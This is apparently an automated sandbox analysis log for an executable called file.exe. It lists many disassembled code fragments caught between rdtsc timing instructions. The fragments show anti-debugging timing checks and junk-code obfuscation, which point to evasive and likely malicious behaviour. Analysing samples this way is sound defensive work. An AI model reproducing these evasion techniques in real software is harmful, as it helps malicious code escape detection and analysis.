                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140D30C second address: 140D3A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F8F34B47B58h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D1B66h] 0x0000002a call 00007F8F34B47B5Ah 0x0000002f push edi 0x00000030 jmp 00007F8F34B47B5Dh 0x00000035 pop edi 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 mov edi, dword ptr [ebp+122D2573h] 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F8F34B47B58h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000014h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b jmp 00007F8F34B47B65h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F8F34B47B5Ah 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140D4EF second address: 140D508 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8F347F9F21h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140D508 second address: 140D588 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F8F34B47B58h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 call 00007F8F34B47B64h 0x0000002d mov dword ptr [ebp+122D1C4Eh], eax 0x00000033 pop ebx 0x00000034 push dword ptr fs:[00000000h] 0x0000003b mov dword ptr [ebp+1245DEBEh], eax 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov edi, 0D853114h 0x0000004d mov di, bx 0x00000050 mov eax, dword ptr [ebp+122D0939h] 0x00000056 mov ebx, dword ptr [ebp+122D38BFh] 0x0000005c push FFFFFFFFh 0x0000005e sub bx, 2611h 0x00000063 push eax 0x00000064 push esi 0x00000065 push eax 0x00000066 push edx 0x00000067 push edx 0x00000068 pop edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14123E7 second address: 14123EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BBAF1 second address: 13BBAF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BBAF7 second address: 13BBAFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412A29 second address: 1412A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007F8F34B47B5Ch 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jnc 00007F8F34B47B67h 0x00000014 jnp 00007F8F34B47B5Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14139CF second address: 14139D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412B92 second address: 1412B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412C40 second address: 1412C66 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8F347F9F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8F347F9F28h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413BCD second address: 1413C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F8F34B47B58h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D356Bh] 0x0000002d push dword ptr fs:[00000000h] 0x00000034 jmp 00007F8F34B47B64h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 push edi 0x00000041 jmp 00007F8F34B47B62h 0x00000046 pop ebx 0x00000047 mov eax, dword ptr [ebp+122D16B1h] 0x0000004d push 00000000h 0x0000004f push ecx 0x00000050 call 00007F8F34B47B58h 0x00000055 pop ecx 0x00000056 mov dword ptr [esp+04h], ecx 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc ecx 0x00000063 push ecx 0x00000064 ret 0x00000065 pop ecx 0x00000066 ret 0x00000067 jl 00007F8F34B47B56h 0x0000006d sub edi, 5673363Dh 0x00000073 push FFFFFFFFh 0x00000075 jmp 00007F8F34B47B61h 0x0000007a nop 0x0000007b push eax 0x0000007c push edx 0x0000007d jl 00007F8F34B47B5Ch 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413C98 second address: 1413C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1413C9E second address: 1413CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1417923 second address: 141792D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8F347F9F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141792D second address: 141793B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F8F34B47B56h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141793B second address: 141795E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F8F347F9F1Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jnp 00007F8F347F9F16h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141795E second address: 1417963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1417963 second address: 1417968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1417968 second address: 141796E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419DAB second address: 1419DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419DAF second address: 1419DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419DB3 second address: 1419DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419DB9 second address: 1419DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419E62 second address: 1419E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414A9E second address: 1414AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1418194 second address: 141819F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414AA4 second address: 1414AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414AA8 second address: 1414AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414AAC second address: 1414ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a jnp 00007F8F34B47B5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141AD2B second address: 141AD2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141A09B second address: 141A09F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141A09F second address: 141A0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141F719 second address: 141F71D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141F71D second address: 141F733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8F347F9F20h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142318C second address: 1423190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423190 second address: 14231A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F8F347F9F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8F347F9F1Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14231A9 second address: 14231B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14231B0 second address: 14231BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F8F347F9F16h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC489 second address: 13CC48D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC48D second address: 13CC4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F8F347F9F1Ch 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jc 00007F8F347F9F16h 0x00000015 jc 00007F8F347F9F16h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC4B0 second address: 13CC4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426C0B second address: 1426C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F29h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1427089 second address: 142708F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142C1BF second address: 142C1C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142C1C5 second address: 142C249 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8F34B47B65h 0x00000008 jmp 00007F8F34B47B5Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F8F34B47B64h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007F8F34B47B66h 0x0000001f pushad 0x00000020 jmp 00007F8F34B47B66h 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 popad 0x00000028 popad 0x00000029 mov eax, dword ptr [eax] 0x0000002b pushad 0x0000002c jmp 00007F8F34B47B69h 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pop edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431A10 second address: 1431A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8F347F9F16h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431A1C second address: 1431A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431A20 second address: 1431A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431A2C second address: 1431A5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F8F34B47B69h 0x00000010 jmp 00007F8F34B47B63h 0x00000015 jmp 00007F8F34B47B5Dh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431D19 second address: 1431D30 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8F347F9F1Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432136 second address: 143215E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8F34B47B56h 0x00000008 jmp 00007F8F34B47B64h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F8F34B47B56h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143215E second address: 1432162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436931 second address: 1436966 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B65h 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F8F34B47B61h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436966 second address: 143696C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143696C second address: 1436970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436970 second address: 1436974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143575E second address: 1435765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1435765 second address: 143576A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143576A second address: 1435772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140119A second address: 13E7F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F8F347F9F23h 0x0000000d nop 0x0000000e call 00007F8F347F9F1Dh 0x00000013 call 00007F8F347F9F27h 0x00000018 jmp 00007F8F347F9F25h 0x0000001d pop edi 0x0000001e pop ecx 0x0000001f lea eax, dword ptr [ebp+12482F5Bh] 0x00000025 push ecx 0x00000026 adc di, 1B1Dh 0x0000002b pop ecx 0x0000002c push eax 0x0000002d jmp 00007F8F347F9F1Bh 0x00000032 mov dword ptr [esp], eax 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F8F347F9F18h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D18EDh] 0x00000055 call dword ptr [ebp+122D1BBEh] 0x0000005b pushad 0x0000005c jng 00007F8F347F9F1Eh 0x00000062 js 00007F8F347F9F16h 0x00000068 pushad 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401713 second address: 1401717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401717 second address: 1401734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8F347F9F1Dh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401734 second address: 1401738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401738 second address: 140175D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d jp 00007F8F347F9F1Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140175D second address: 140177D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jc 00007F8F34B47B6Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8F34B47B5Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140177D second address: 1401794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add cx, CE5Fh 0x0000000c push 25342E72h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14018E7 second address: 14018ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14018ED second address: 14018F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401947 second address: 1401989 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8F34B47B69h 0x0000000b popad 0x0000000c mov dword ptr [esp], esi 0x0000000f xor cl, 00000050h 0x00000012 nop 0x00000013 push ecx 0x00000014 pushad 0x00000015 jns 00007F8F34B47B56h 0x0000001b jmp 00007F8F34B47B5Bh 0x00000020 popad 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401989 second address: 140198D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401B56 second address: 1401B87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jnc 00007F8F34B47B56h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8F34B47B5Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14021D5 second address: 14021DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14024BE second address: 14024C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14024C3 second address: 14024D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14024D0 second address: 14024D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14024D4 second address: 13E8AD7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 cmc 0x00000009 call dword ptr [ebp+122D2504h] 0x0000000f pushad 0x00000010 push eax 0x00000011 jne 00007F8F347F9F16h 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8F347F9F1Eh 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E8AD7 second address: 13E8ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E8ADD second address: 13E8AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1435A12 second address: 1435A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1435A27 second address: 1435A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1435A2B second address: 1435A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8F34B47B60h 0x0000000c jng 00007F8F34B47B56h 0x00000012 jp 00007F8F34B47B56h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jbe 00007F8F34B47B68h 0x00000022 jmp 00007F8F34B47B62h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436329 second address: 1436334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8F347F9F16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436334 second address: 1436350 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B61h 0x00000007 pushad 0x00000008 js 00007F8F34B47B56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143D94E second address: 143D958 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8F347F9F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
